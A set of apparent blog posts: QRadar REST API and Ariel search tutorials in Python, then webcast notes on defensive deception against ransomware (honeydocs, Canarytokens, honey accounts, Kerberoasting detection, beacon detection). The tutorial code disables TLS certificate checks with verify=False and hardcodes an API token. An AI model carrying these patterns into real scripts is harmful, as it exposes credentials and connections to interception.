  'aql': 'SELECT logsourcename(logSourceId) AS \'Log Source\', UniqueCount("sourceIP") AS \'Source IP (Unique Count)\', UniqueCount("destinationIP") AS \'Destination IP (Unique Count)\', UniqueCount("destinationPort") AS \'Destination Port (Unique Count)\', UniqueCount(qid) AS \'Event Name (Unique Count)\', UniqueCount(category) AS \'Low Level Category (Unique Count)\', UniqueCount("protocolId") AS \'Protocol (Unique Count)\', UniqueCount("userName") AS \'Username (Unique Count)\', MAX("magnitude") AS \'Magnitude (Maximum)\', SUM("eventCount") AS \'Event Count (Sum)\', COUNT(*) AS \'Count\' from events GROUP BY logSourceId order by "Event Count (Sum)" desc last 6 hours',
  'is_shared': True}]
'''
type(res_json)
# list
len(res_json)
# 1

It is to be noted that res_json is of type list with a length of 1. We must remember this while attempting to parse the values.

Our goal is to capture the Saved Search ID using its key - id. We will define a variable called SAVED_SEARCH_ID to hold the Saved Search ID as seen below.

SAVED_SEARCH_ID = res_json[0]['id']
SAVED_SEARCH_ID
# 2721

Now that we have the Saved Search ID (2721), we can create the QRadar Ariel Search by defining the request URL and request parameters as seen below.

method = "POST"
url = 'https://192.168.56.144/api/ariel/searches'
params = {'saved_search_id':SAVED_SEARCH_ID}
params
# {'saved_search_id': 2721}

The next step is to make a POST request using our previously defined function do_request as seen below. The result is stored in a variable called res_json.

res_json = do_request(method, url, params)
res_json
'''
{'cursor_id': '789355dd-2bb9-454a-9d05-26ba4d373d48',
 'status': 'WAIT',
 'compressed_data_file_count': 0,
 'compressed_data_total_size': 0,
 'data_file_count': 0,
 'data_total_size': 0,
 'index_file_count': 0,
 'index_total_size': 0,
 'processed_record_count': 0,
 'desired_retention_time_msec': 86400000,
 'progress': 0,
 'progress_details': [],
 'query_execution_time': 0,
 'query_string': 'SELECT logsourcename(logSourceId) AS \'Log Source\', UniqueCount("sourceIP") AS \'Source IP (Unique Count)\', UniqueCount("destinationIP") AS \'Destination IP (Unique Count)\', UniqueCount("destinationPort") AS \'Destination Port (Unique Count)\', UniqueCount(qid) AS \'Event Name (Unique Count)\', UniqueCount(category) AS \'Low Level Category (Unique Count)\', UniqueCount("protocolId") AS \'Protocol (Unique Count)\', UniqueCount("userName") AS \'Username (Unique Count)\', MAX("magnitude") AS \'Magnitude (Maximum)\', SUM("eventCount") AS \'Event Count (Sum)\', COUNT(*) AS \'Count\' from events GROUP BY logSourceId order by "Event Count (Sum)" desc last 6 hours',
 'record_count': 0,
 'size_on_disk': 0,
 'save_results': False,
 'completed': False,
 'subsearch_ids': [],
 'snapshot': None,
 'search_id': '789355dd-2bb9-454a-9d05-26ba4d373d48'}
'''

Our goal is to capture the Search ID using its key - search_id. We will define a variable called SEARCH_ID to hold the Search ID as seen below.

SEARCH_ID = res_json['search_id']
SEARCH_ID
# '789355dd-2bb9-454a-9d05-26ba4d373d48'

The next step is to invoke the check_status recursive function with the Search ID as seen below. The return value will be stored into a variable called resp.

resp = check_status("WAIT", SEARCH_ID)
'''
Waiting for 3 seconds...
Search Completed
'''
resp
'''
{'events': [{'Log Source': 'Health Metrics-2 :: localhost',
   'Source IP (Unique Count)': 1.0,
   'Destination IP (Unique Count)': 1.0,
   'Destination Port (Unique Count)': 1.0,
   'Event Name (Unique Count)': 1.0,
   'Low Level Category (Unique Count)': 1.0,
   'Protocol (Unique Count)': 1.0,
   'Username (Unique Count)': 0.0,
   'Magnitude (Maximum)': 5.0,
   'Event Count (Sum)': 113760.0,
   'Count': 113760.0},
  {'Log Source': 'System Notification-2 :: qradar',
   'Source IP (Unique Count)': 2.0,
   'Destination IP (Unique Count)': 1.0,
   'Destination Port (Unique Count)': 1.0,
   'Event Name (Unique Count)': 4.0,
   'Low Level Category (Unique Count)': 3.0,
   'Protocol (Unique Count)': 1.0,
   'Username (Unique Count)': 0.0,
   'Magnitude (Maximum)': 7.0,
   'Event Count (Sum)': 23292.0,
   'Count': 23292.0},
  {'Log Source': 'SIM Audit-2 :: qradar',
   'Source IP (Unique Count)': 3.0,
   'Destination IP (Unique Count)': 1.0,
   'Destination Port (Unique Count)': 1.0,
   'Event Name (Unique Count)': 8.0,
   'Low Level Category (Unique Count)': 2.0,
   'Protocol (Unique Count)': 1.0,
   'Username (Unique Count)': 5.0,
   'Magnitude (Maximum)': 8.0,
   'Event Count (Sum)': 168.0,
   'Count': 168.0},
  {'Log Source': 'Anomaly Detection Engine-2 :: qradar',
   'Source IP (Unique Count)': 1.0,
   'Destination IP (Unique Count)': 1.0,
   'Destination Port (Unique Count)': 1.0,
   'Event Name (Unique Count)': 1.0,
   'Low Level Category (Unique Count)': 1.0,
   'Protocol (Unique Count)': 1.0,
   'Username (Unique Count)': 0.0,
   'Magnitude (Maximum)': 3.0,
   'Event Count (Sum)': 16.0,
   'Count': 16.0}]}
'''
type(resp)
# dict

The print statements defined in the check_status function help us understand if the search is still running or if it has completed.

Note: You can customize the verbosity of the messages in the check_status function. While simple print statements are helpful, there are other logging mechanisms available at your disposal.

We can see that resp contains the response - the result of our Top Log Sources QRadar Ariel Search in JSON format. However, the actual data we are interested in is stored under the key events.

type(resp['events'])
# list
len(resp['events'])
# 4

At this point, it is useful to store the raw JSON data into a different data structure - namely, a Pandas DataFrame.

The best way to convert our Array of JSON objects; i.e., resp['events'] which is of type list into a DataFrame is by using the pandas.json_normalize function as seen below.

df = pandas.json_normalize(resp['events'])
type(df)
# pandas.core.frame.DataFrame
df

As per the above snippet, the variable df now holds our result DataFrame.

The dimensions of the DataFrame can be retrieved using pandas.DataFrame.shape which returns a tuple of dimensions as seen below.

df.shape
# (4, 11)

Now that we have our result DataFrame, we can aggregate, visualize, and export the data as desired.

The below screenshot shows the final Jupyter Notebook.

Conclusion

In this tutorial, we learnt how to leverage the QRadar Ariel Search REST API endpoints to run Ariel searches and fetch their results programmatically using Python. To summarize:

We started by understanding the relevance of searching in QRadar and how it is a basic but essential functionality.

Then, we dissected the high-level steps involved in running a new QRadar Ariel Search programmatically. Here, we discussed when to use a raw AQL Query and when to use a Saved Search ID. A diagram was provided to visualize the steps in the workflow.

Next, we delved into the various QRadar Ariel Search REST API endpoints available on QRadar to complete all the steps in the workflow. Here, we discussed about each endpoint including its response fields, parameters, and sample JSON response.

Then, we wrote Python code using the concept of recursion to implement the steps in the workflow. We took an example Saved Search (Top Log Sources) and explained how we can capture its corresponding Saved Search ID, create a new QRadar Ariel Search, check its completion status, and retrieve the result in JSON format. We also converted the JSON response into a Pandas DataFrame to make querying and aggregation easier.

Using the concepts discussed in this tutorial, you can easily write Python code to automate QRadar searching tasks (such as Threat Hunting and SOC Reporting) which previously required manual effort.

You can view and download the Jupyter Notebook from this tutorial using the link below.

Jupyter Notebook: QRadar Ariel Search API

I hope you enjoyed reading this tutorial. Please reach out via email if you have any questions or comments.

Qradar Rest Apis Python

2021-10-06T00:00:00+00:00

Introduction

In this tutorial, we will learn how to get started with the QRadar REST APIs and write basic Python scripts to fetch sample data from QRadar.

Note: This tutorial assumes you have admin access to a live QRadar deployment. For the purpose of this tutorial, I am using QRadar Community Edition. Please follow my step-by-step guide - How to install IBM QRadar CE V7.3.3 on VirtualBox to get a basic QRadar deployment up and running in your lab environment.

According to IBM QRadar documentation:

You access the RESTful API by sending HTTPS requests to specific URLs (endpoints) on the QRadar® SIEM Console. To send these requests, use the HTTP implementation that is built in to the programming language of your choice. Each request contains authentication information, and parameters that modify the request.

Pre-requisites

QRadar with admin access

I am using QRadar CE V7.3.3 as described above.
Python 3.x.x

I am using Python 3.9.7 on my MacBook Pro with macOS Big Sur.

The code written in this tutorial might cause issues with Python 2. Please refer to Python.org to download the latest release of Python 3 for your OS.

Use the command: python --version to find the exact version of Python installed on your system. You might also want to try: python3 --version as python might refer to Python 2.
pip (Python Package Installer)

pip is a useful utility to install Python packages. I am using pip 21.2.4.

Usually, pip comes automatically installed with Python. You can verify by running the command: pip --version which should output the exact version of pip and which Python version it is associated with. You might also want to try: pip3 --version as pip might refer to Python 2.

If your Python environment does not have pip installed by default, please refer to the pip Installation documentation.

Setting up the Environment

In this section, we will set-up the environment by installing the necessary tools and packages to start writing Python code to make REST API requests to QRadar.

Installing Python Packages

Let us install the following Python packages using pip:

requests - requests is an elegant and simple HTTP library for Python, built for human beings.

pip install requests
pandas - pandas is a fast, powerful, flexible and easy to use open source data analysis and manipulation tool, built on top of the Python programming language.

pip install pandas

Installing Jupyter Notebook

Creating scripts in Python for beginners can be a daunting task. To make the coding experience easier and more intuitive, we will use a Jupyter Notebook.

According to Project Jupyter:

The Jupyter Notebook is an open-source web application that allows you to create and share documents that contain live code, equations, visualizations and narrative text. Uses include: data cleaning and transformation, numerical simulation, statistical modeling, data visualization, machine learning, and much more.

Jupyter supports over 40 programming languages, including Python, R, Julia, and Scala. Notebooks can be shared with others using email, Dropbox, GitHub and the Jupyter Notebook Viewer.

We will create a new Jupyter Notebook with Python code. The first step is to install Jupyter. The recommended approach is to install Jupyter using Anaconda and conda. According to Jupyter documentation:

While Jupyter runs code in many programming languages, Python is a requirement (Python 3.3 or greater, or Python 2.7) for installing the Jupyter Notebook.

For new users, we highly recommend installing Anaconda. Anaconda conveniently installs Python, the Jupyter Notebook, and other commonly used packages for scientific computing and data science.

However, for the purpose of this tutorial, we will use the alternative approach which involves manually installing Jupyter with pip. According to Jupyter documentation:

First, ensure that you have the latest pip; older versions may have trouble with some dependencies:

pip3 install --upgrade pip

Then install the Jupyter Notebook using:

pip3 install jupyter

Note: If pip3 does not work, please try using pip or python3 -m pip instead.

Once completed, start the Jupyter Notebook server using the command jupyter notebook as seen in the screenshot below.

If successful, your browser should automatically open and navigate to the Notebook Dashboard at http://localhost:8888.

If the browser is not launched automatically, copy-and-paste the URL to the browser as mentioned in the CLI. For example: http://localhost:8888/?token=10b589db740aa7a744a4aeaa3453feaab701dc03b89d59c5. Then, the browser should navigate to the Notebook Dashboard as seen above.

For more information about running the Jupyter Notebook Server, please refer to Running the Notebook.

Creating a Jupyter Notebook

To create a new Jupyer Notebook, click on the New drop-down button and select Python 3 (ipykernal) as seen in the screenshot below.

A new browser tab will be opened with the Notebook User Interface as seen in the screenshot below.

Python code can be written in the code cell. When the Run button is clicked, the code cell is executed and its output is displayed as seen in the screenshot below.

According to Jupyter documentation:

There are three types of cells: code cells, markdown cells, and raw cells.

A code cell allows you to edit and write new code, with full syntax highlighting and tab completion. The programming language you use depends on the kernel, and the default kernel (IPython) runs Python code.

You can document the computational process in a literate way, alternating descriptive text with code, using rich text. In IPython this is accomplished by marking up text with the Markdown language. The corresponding cells are called Markdown cells.

Raw cells provide a place in which you can write output directly. Raw cells are not evaluated by the notebook.

Generating a QRadar API Token

There are 2 ways to authenticate to QRadar while making an API request:

Username and Password
API Token

The recommended approach is to use an API Token for authentication via scripts. On QRadar, the API Token is also known as a SEC Token and must be generated by the admin on the QRadar Console.

To generate a QRadar API Token, navigate to the Admin tab and click on Authorized Services as seen in the screenshot below.

A list of existing authorized services will be displayed as seen in the screenshot below. Click on Add Authorized Service to generate a new API Token.

A pop-up will emerge with a form. In the form, provide a Service Name and select No Expiry for the Expiry Date as seen in the screenshot below. Click on Create Service.

QRadar will create a new authorized service. Copy the content under Authentication Token and paste it someplace safe. As seen in the screenshot below, QRadar requires to Deploy Changes to persist the newly created authorized service. Close the pop-up.

On the Admin tab, QRadar will alert us about undeployed changes as seen in the screenshot below. Click on Deploy Changes.

Allow the process a couple of minutes to complete successfully.

Once completed, the alert will disappear.

For more information about authorized services, please refer to Managing authorized services.

QRadar Interactive API Documentation

Before we dive into the QRadar APIs, it is essential to keep a reference to the Interactive API Documentation for Developers page.

The Interactive API Documentation for Developers page is accessible from the QRadar Console and provides access to the documentation for various endpoints including their parameters and responses. Users can execute the APIs with custom parameters to view responses in real-time. It provides developers an opportunity to test the API before writing scripts.

To access the Interactive API Documentation for Developers page, login to the QRadar Console, click on the hamburger menu on the top-left, and then click on Interactive API for Developers as seen in the screenshot below.

A new browser tab will be opened with the Interactive API Documentation for Developers page as seen in the screenshot below.

To view the documentation of a specific API, expand the folders on the left side and select the desired endpoint. Depending on the endpoint, all available methods (GET, POST, PUT, DELETE) will be displayed on the top. Click on the desired method to view the corresponding API documentation. In the screenshot below, we can see the API documentation for the endpoint /analytics/rules/{id} with the GET method.

API #1: About System

We begin the journey of discovering QRadar APIs with a simple goal to retrieve the current system information.

QRadar Interactive API

We can dissect our goal and map a retrieval to a GET request. Based on this, the correct QRadar endpoint to target is /system/about which only has GET in its list of available methods as seen in the screenshot below.

We can also identify the expected response of the API request. The response is in JSON format and contains 3 fields:

build_version - String
external_version - String
release_name - String

Scroll down to see information about any optional and required parameters for the API request. As per the screenshot below, there is one optional Query parameter called fields which allows us to specify which fields we would like to be returned in the response.

It is also useful to note the cURL one-liner command which can be used verbatim to make the API request and retrieve its response using the popular cURL utility.

Click on Try It Out! to execute the API request in real-time and view its response as seen in the screenshot below.

From the above screenshot, we have the JSON response, which is:

{
  "release_name": "7.3.3",
  "build_version": "2019.14.0.20191031163225",
  "external_version": "7.3.3"
}

Now that we have tested the /system/about API on the Interactive API Documentation page, it is time to write Python code to make the API request and retrieve its response.

Python Code

We start by importing the requests Python package as seen below.

import requests

The next step is to define a variable called SEC_TOKEN to hold the QRadar API Token that we generated above as seen below.

SEC_TOKEN = '4150d602-11ba-4d55-b3de-b6ebfe8b93ac'
type(SEC_TOKEN)
# str

We will also define a variable called URL to hold the complete QRadar API URL to target the /system/about endpoint as seen below.

URL = 'https://192.168.56.144/api/system/about'
type(URL)
# str

Note: The complete QRadar API URL is provided on the Interactive API Documentation page corresponding to the endpoint.

header = {
    'SEC':SEC_TOKEN,
    'Content-Type':'application/json',
    'accept':'application/json'
}
type(header)
# dict

After the variables have been defined, we can make the GET request using the requests.get function as seen below. The result is stored in a variable called r.

According to Python requests documentation:

Requests verifies SSL certificates for HTTPS requests, just like a web browser. By default, SSL verification is enabled, and Requests will throw a SSLError if it’s unable to verify the certificate.

Requests can also ignore verifying the SSL certificate if you set verify to False.

r = requests.get(URL, headers=header, verify=False)
type(r)
# requests.models.Response

Note: As we have set verify to False, you will likely see an InsecureRequestWarning, which can be safely ignored in this tutorial.

We can access the content of the response using response.text as seen below.

r.text
# '{"release_name":"7.3.3","build_version":"2019.14.0.20191031163225","external_version":"7.3.3"}'
type(r.text)
# str

However, response.text contains a String value. Although, we could manually decode it using the json.loads function, the easier approach is to use the response.json function to decode the content in JSON format as seen below.

r.json()
'''
{'release_name': '7.3.3',
 'build_version': '2019.14.0.20191031163225',
 'external_version': '7.3.3'}
'''
type(r.json())
# dict

It is now easy to access each field using its key. Below, we see how to access the content of release_name.

r.json()['release_name']
# '7.3.3'

The below screenshot shows the final Jupyter Notebook.

API #2: QRadar Rules

In the previous section, we targeted a simple QRadar API and retrieved the current system information. Let us take things to the next-level!

In this section, we will target a more complex QRadar API with an aim to retrieve all the Rules on the system. Once the Rules are retrieved, we will export them to a neat CSV file.

Note: This is a practical example. As a QRadar admin, you are likely to receive requests to generate an export of the Rules. Don’t worry, I got you covered!

QRadar Interactive API

Similar to the goal in previous section, we can dissect our current goal and map a retrieval to a GET request. Based on this, the correct QRadar endpoint to target is /analytics/rules which only has GET in its list of available methods as seen in the screenshot below.

There are 14 fields returned in the JSON response. They are:

id - Long
name - String
type - String
enabled - Boolean
owner - String
origin - String
base_capacity - Long
base_host_id - Long
average_capacity - Long
capacity_timestamp - Long
identifier - String
linked_rule_identifier - String
creation_date - Long
modification_date - Long

Scroll down to see information about the parameters. As per the screenshot below, there are 3 optional parameters:

fields - Query parameter which allows us to specify which fields we would like to be returned in the response.
filter - Query parameter which allows us to specify filters to limit the contents returned in the response.
Range - Header parameter which allows us to to restrict the number of elements that are returned in the response.

Note: The Range parameter is usually pre-populated with the value items=0-49 on the Interactive API Documentation page. This is done to ensure that particularly large API requests do not bombard the system and increase utilization of resources. However, this can be modified or removed, as the parameter value is in a text-box which is editable.

While testing, it is always recommended to limit the number of elements returned in the response by using the Range Header parameter.

Click on Try It Out! to execute the API request in real-time and view its response as seen in the screenshot below.

From the above screenshot, we have the JSON response, which is:

[
  {
    "owner": "admin",
    "identifier": "SYSTEM-500",
    "base_host_id": 0,
    "capacity_timestamp": 0,
    "origin": "SYSTEM",
    "creation_date": 1217009466305,
    "type": "EVENT",
    "enabled": true,
    "modification_date": 1622547818835,
    "linked_rule_identifier": null,
    "name": "System: Notification",
    "average_capacity": 0,
    "id": 500,
    "base_capacity": 0
  },
  {
    "owner": "admin",
    "identifier": "SYSTEM-1443",
    "base_host_id": 0,
    "capacity_timestamp": 0,
    "origin": "SYSTEM",
    "creation_date": 1273171233573,
    "type": "EVENT",
    "enabled": false,
    "modification_date": 1622547818194,
    "linked_rule_identifier": null,
    "name": "Devices with High Event Rates",
    "average_capacity": 0,
    "id": 100001,
    "base_capacity": 0
  },
  .
  .
  .
]

Basically, there is raw JSON data associated with 50 QRadar Rules. The above snippet has been truncated considering the number of lines required to represent the entire JSON response.

It is crucial to note that the response is NOT just a single JSON object. In fact, it is an Array of JSON objects. This representation makes sense because each QRadar Rule is a JSON object with its own key-value pairs. Since there are multiple Rules in the response, an Array is the perfect data structure to contain all the Rules.

Now that we have tested the /analytics/rules API on the Interactive API Documentation page, it is time to write Python code to make the API request and retrieve its response.

Python Code

Create a new Jupyter Notebook and start by importing the requests and pandas Python packages as seen below.

import requests
import pandas

Similar to the Python code in the previous section, we will define a variable called SEC_TOKEN to hold the QRadar API Token that we generated above as seen below.

SEC_TOKEN = '4150d602-11ba-4d55-b3de-b6ebfe8b93ac'
type(SEC_TOKEN)
# str

Similar to the Python code in the previous section, we will also define a variable called URL to hold the complete QRadar API URL to target the /analytics/rules endpoint as seen below.

URL = 'https://192.168.56.144/api/analytics/rules'
type(URL)
# str

Note: The complete QRadar API URL is provided on the Interactive API Documentation page corresponding to the endpoint.

Similar to the Python code in the previous section, we will also define a variable called header to hold the Header content for the API request as seen below. We will utilize the SEC_TOKEN variable that was defined above as a value to the key SEC.

header = {
    'SEC':SEC_TOKEN,
    'Content-Type':'application/json',
    'accept':'application/json'
}
type(header)
# dict

After the variables have been defined, we can make the GET request using the requests.get function as seen below. The result is stored in a variable called r.

r = requests.get(URL, headers=header, verify=False)
type(r)
# requests.models.Response

Note: As we have set verify to False, you will likely see an InsecureRequestWarning, which can be safely ignored in this tutorial.

We can access the content of the response using response.text as seen below.

r.text
# '[{"owner":"admin","identifier":"SYSTEM-500","base_host_id":0,"capacity_timestamp":0,"origin":"SYSTEM","creation_date":1217009466305,"type":"EVENT","enabled":true,"modification_date":1622547818835,"linked_rule_identifier":null,"name":"System: Notification","average_capacity":0,"id":500,"base_capacity":0},{"owner":"admin","identifier":"SYSTEM-1443","base_host_id":0,"capacity_timestamp":0,"origin":"SYSTEM","creation_date":1273171233573,"type":"EVENT","enabled":false,"modification_date":1622547818194,"linked_rule_identifier":null,"name":"Devices with High Event Rates","average_capacity":0,"id":100001,"base_capacity":0},...]'
type(r.text)
# str

The output of r.text has been truncated considering the number of lines required to represent the entire response.

Similar to the Python code in the previous section, we will utilize the response.json function to decode the content in JSON format as seen below.

r.json()
'''
[{'owner': 'admin',
  'identifier': 'SYSTEM-500',
  'base_host_id': 0,
  'capacity_timestamp': 0,
  'origin': 'SYSTEM',
  'creation_date': 1217009466305,
  'type': 'EVENT',
  'enabled': True,
  'modification_date': 1622547818835,
  'linked_rule_identifier': None,
  'name': 'System: Notification',
  'average_capacity': 0,
  'id': 500,
  'base_capacity': 0},
 {'owner': 'admin',
  'identifier': 'SYSTEM-1443',
  'base_host_id': 0,
  'capacity_timestamp': 0,
  'origin': 'SYSTEM',
  'creation_date': 1273171233573,
  'type': 'EVENT',
  'enabled': False,
  'modification_date': 1622547818194,
  'linked_rule_identifier': None,
  'name': 'Devices with High Event Rates',
  'average_capacity': 0,
  'id': 100001,
  'base_capacity': 0},
  .
  .
  .
]
'''
type(r.json())
# list
len(r.json())
# 168
type(len(r.json()))
# int

It is crucial to note the type of r.json(). It is a list and NOT dict like in the previous section.

Based on this, we can derive our first insight from the data - the total number of QRadar Rules on the system, which can be captured by calculating the length of the JSON response. In the above snippet, len(r.json()) does exactly this and gives us 168 (an integer).

Now, consider querying the data. For starters, we would need to loop the list and go item-by-item. Below, we attempt to print out the name of each Rule line-by-line.

for rule in r.json():
    print(rule['name'])
'''
System: Notification
Devices with High Event Rates
Excessive Database Connections
Excessive Firewall Accepts Across Multiple Hosts
Excessive Firewall Denies from Single Source
AssetExclusion: Exclude DNS Name By IP
AssetExclusion: Exclude DNS Name By MAC Address
AssetExclusion: Exclude DNS Name By NetBIOS Name
.
.
.
'''

Okay, that was straightforward. How about performing a group-by operation? For example: Count of Rules by enabled; i.e., how many Rules are enabled and how many Rules are disabled?

Note: enabled is a column in the JSON response and holds a Boolean value of either True or False to indicate if a Rule is enabled or not on the system.

enabled_count = 0 
disabled_count = 0
for rule in r.json():
    if rule['enabled']==True:
        enabled_count += 1
    else:
        disabled_count += 1
print(enabled_count)
# 131
print(disabled_count)
# 37

Probably not the most efficient approach, but it does give us the answer to our question.

At this point, it is useful to store the raw JSON data into a different data structure - namely, a Pandas DataFrame.

According to GeeksforGeeks:

Pandas DataFrame is two-dimensional size-mutable, potentially heterogeneous tabular data structure with labeled axes (rows and columns). A Data frame is a two-dimensional data structure, i.e., data is aligned in a tabular fashion in rows and columns. Pandas DataFrame consists of three principal components, the data, rows, and columns.

The best way to convert our Array of JSON objects; i.e., r.json() which is of type list into a DataFrame is by using the pandas.json_normalize function as seen below.

According to Pandas documentation:

pandas provides a utility function to take a dict or list of dicts and normalize this semi-structured data into a flat table.

df = pandas.json_normalize(r.json())
type(df)
# pandas.core.frame.DataFrame
df

As per the above snippet, the variable df now holds our Rules DataFrame.

In this output of df, we can see the dimensions of the DataFrame, which is 168 rows x 14 columns. The same can be retrieved using pandas.DataFrame.shape which returns a tuple of dimensions as seen below.

df.shape
# (168, 14)
type(df.shape)
# tuple

Okay, we now have our DataFrame. What’s next?

Well, let’s go back to that group-by operation from earlier; i.e., Count of Rules by enabled. Below, we will attempt to calculate the result using the DataFrame and its associated functions.

df.groupby('enabled').size()
'''
enabled
False     37
True     131
dtype: int64
'''

Look at that, a one-liner!

If we dissect the above snippet, we can see the use of the pandas.DataFrame.groupby function to perform the actual grouping based on the enabled column. Once the grouping is completed, we can aggregate and calculate the counts in each group using the pandas.core.groupby.GroupBy.size function which returns a pandas.core.series.Series.

According to GeeksforGeeks:

Pandas Series is a one-dimensional labeled array capable of holding data of any type (integer, string, float, python objects, etc.).

To retrieve the actual values from the Series, we simply need to use the index as seen below.

enabled_count = df.groupby('enabled').size()[True]
enabled_count
# 131
type(enabled_count)
# numpy.int64
disabled_count = df.groupby('enabled').size()[False]
disabled_count
# 37
type(disabled_count)
# numpy.int64

Note: The index values (True and False) are of type Boolean (bool) and NOT String.

Awesome! If you remember, we have one more thing to do. Yes, we wanted to export the QRadar Rules to CSV.

We can easily export a DataFrame to CSV using the pandas.DataFrame.to_csv function as seen below.

df.to_csv('rules_export.csv')

The file should be exported to the directory from where you are running your Jupyter Notebook.

We can open the file rules_export.csv on a text editor to view the raw data as seen in the screenshot below.

We can also open the file rules_export.csv with Microsoft Excel which provides a more tabular view of the data as seen in the screenshot below.

The below screenshot shows the final Jupyter Notebook.

Conclusion

In this tutorial, we installed and leveraged Jupyter Notebook to write Python code to programmatically retrieve and parse data from QRadar. To summarize:

We started by setting up the environment which involved installing the relevant Python packages, installing Jupyter Notebook, and generating a QRadar API Token to authenticate to QRadar while make API requests.

Then, we touched on the QRadar Interactive API Documentation, which is a powerful knowledge-base for developers.

We began our QRadar API journey with an aim to retrieve the current system information. We went step-by-step in the process of identifying the corresponding API’s response fields, parameters, and sample JSON response in the Interactive API Documentation page. Then, we wrote Python code using the requests Python package to make a GET request and parse the response to capture individual field values.

Next, we advanced on our journey with an aim to retrieve all the QRadar Rules and export them to a CSV file. Again, we went step-by-step in the process of identifying the corresponding API’s response fields, parameters, and sample JSON response in the Interactive API Documentation page. In the sample JSON response, we identified that the response was NOT a single JSON object. Instead, the response was an Array of JSON objects. Keeping that in mind, we wrote Python code using the requests Python package to make a GET request and parse the response. The response was a Python list and posed challenges while performing querying and aggregation. To better store and analyze the data, we leveraged the pandas Python package and created a new DataFrame which made querying and aggregation much easier. Finally, we exported the Rules to a CSV file using the handy pandas.DataFrame.to_csv function.

You can view and download the Jupyter Notebooks from this tutorial using the links below.

Jupyter Notebook 1: QRadar About System API

Jupyter Notebook 2: QRadar Rules API

I hope you enjoyed reading this tutorial. Please reach out via email if you have any questions or comments.

Ransomware Notes Bhis

2021-05-13T00:00:00+00:00

It’s always interesting to read about the devastation that Ransomware brings about to organizations around the globe. Recently, on May 7, Colonial Pipeline fell victim to a Ransomware attack orchestrated by the DarkSide group. Check out this ZDNet article and this Security Intelligence post summarizing the incident.

While the investigations (and aftermaths) are ongoing, I came across this emergency webcast organized by Black Hills Information Security presented by John Strand on YouTube.

In this post, I wanted to list the key takeaways (trends, tools, and techniques) from the webcast. They are:

Attack Motivation

Rather than targeting organizations limited to having IT environments, attackers have understood the value and impact of targeting critical infrastructure with OT environments. The reasoning is simple - more chaos and destruction - forcing organizations to pay the ransom to ensure that critical infrastructure and lives continue.

As seen in the Tweets below from Patrick De Haan (@GasBuddyGuy), this is a classic example of chaos - limited resources leading to panic-buying of fuel.

BREAKING: 71% of gas stations in metro Atlanta are without fuel.
— Patrick De Haan ⛽️📊 (@GasBuddyGuy) May 13, 2021

South Florida- you'd be well advised to stop panic buying- you're creating something from nothing.
— Patrick De Haan ⛽️📊 (@GasBuddyGuy) May 13, 2021

NATIONAL AVERAGE REACHES $3/GAL, FIRST TIME IN NEARLY 7 YEARS

The national average price of gasoline has reached $3 per gallon for the first time October 30, 2014.
— Patrick De Haan ⛽️📊 (@GasBuddyGuy) May 12, 2021

Deception

John says that Deception is no longer a “nice to have”. In fact, Deception is core and essential.

EDR in itself is not sufficient to protect. We spend too much effort and time securing the endpoint. However, companies are still getting compromised with EDR solutions deployed.

Deception should be more than just Honeypots. We need to be looking at the attack pathways that attackers take post-exploitation to move laterally in an environment to take over that enivornment. The attackers are practicing tried-and-tested techniques which are the same techniques used by red teams/pen-testing professionals.

Put Deception in the right places to detect when something has gone awry.

Techniques

Set bait for attackers. Word documents are great because we can put them on:

Shares
Compromised systems
Websites
Email to spammers

Set in the right place to get triggered when an attacker accesses it. You can extract multiple valuable fields, such as:

IP address
Machine name
User ID

Bonus: Easy alternative to DLP solution

What to check out:

jqreator/honeydoc

HoneyDoc creates a “honey” document including things like fake names and social security numbers to look appealing to would be attackers. It also includes a 1x1 pixel png file called hello.png as the tracking image so that you can see the IPs of who opens the document in your web server logs. To install the image, place it in your web servers root directory (or any other directory you want to use) and specify your URL using the --url flag when generating the document.

Once the document is generated it can be edited and personalized to make it look any way you want.

Check out HoneyDoc’s GitHub repo for more information about installation and usage.
Canarytokens
You’ll be familiar with web bugs, the transparent images which track when someone opens an email. They work by embedding a unique URL in a page’s image tag, and monitoring incoming GET requests.

Imagine doing that, but for file reads, database queries, process executions or patterns in log files. Canarytokens does all this and more, letting you implant traps in your production systems rather than setting up separate honeypots.

How Canarytokens work (in 3 short steps):
1. Go to canarytokens.org and select your Canarytoken (supply an email to be notified at as well as a memo that reminds you which Canarytoken this is and where you put it).
2. Place the generated Canarytoken somewhere special (read the examples for ideas on where).
3. If an attacker ever trips on the Canarytoken somehow, you’ll get an email letting you know that it is happened.
Check out Canarytoken’s excellent documentation to view examples and more.
Honey Accounts

Useful to detect attackers trying to fly under-the-radar of SIEM and UEBA when they use a technique such as password spraying. As soon as they attempt to login to the honey account, a rule is triggered to shutdown the machine and alert the SOC/IR team.

The idea is that when someone does breach your network perimeter, some of the first steps in performing recon is collecting information from Active Directory. In this recon, they stumble on a DA account called ‘helpdeskDA’. They even discover a password in the description! Well this looks like an easy win and a critical finding. In order to figure out how to leverage this new found user, the attacker attempts to RDP or use psexec to move to a higher value target. In doing so, AD checks the credentials and returns to the attacker that his newfound account is not allowed to login during this time. Meanwhile, this login attempt has triggered an alert and is being investigated.

Check out this post from Jordan Potti for steps and more information.
Kerberoasting Deception

Threat actors can abuse the Kerberos protocol to recover passwords related to service accounts using a tactic called Kerberoasting. In a Windows domain, the authentication protocol Kerberos uses a Ticket Granting Ticket (TGT) to request access tokens from the Ticket Granting Service (TGS) for specific resources/systems joined to the domain.

In Kerberoasting, threat actors abuse valid Kerberos TGTs to make a request for a TGS from any valid Service Principal Name (SPN) within your Microsoft Active Directory domain. These TGSs are vulnerable to offline password cracking, which can allow a threat actor to recover the plaintext password of the associated service account mapped by the SPN.

To avoid false positive detections, you can create a service account honeypot (honeycred) to detect Kerberoasting.

Check out Blumira’s Guide To Cybersecurity Deception Techniques for more information.

Beacons

What is C&C Beaconing?

Command-and-Control (C&C or C2) beaconing is a type of malicious communication between a C&C server and malware on an infected host. C&C servers can orchestrate a variety of nefarious acts, from denial of service (DoS) attacks to ransomware to data exfiltration.

Often, the infected host will periodically check in with the C&C server on a regular schedule, hence the term beaconing. This pattern can differentiate it from normal traffic because of the regularity of intervals. But beaconing on common ports and protocols (such as HTTP:80 or HTTPS:443) often obscures malicious traffic within normal traffic and helps the attacker evade firewalls. Another evasion tactic, notably used by SUNBURST, involves waiting long, randomized periods of time before communicating.

Check out ExtraHop’s quick primer on C&C Beaconing for more information.

What to check out:

activecm/rita
RITA (Real Intelligence Threat Analytics) is a framework for detecting command and control communication through network traffic analysis.

The framework ingests Zeek logs in TSV format, and currently supports the following major features:
1. Beaconing Detection: Search for signs of beaconing behavior in and out of your network
2. DNS Tunneling Detection Search for signs of DNS based covert channels
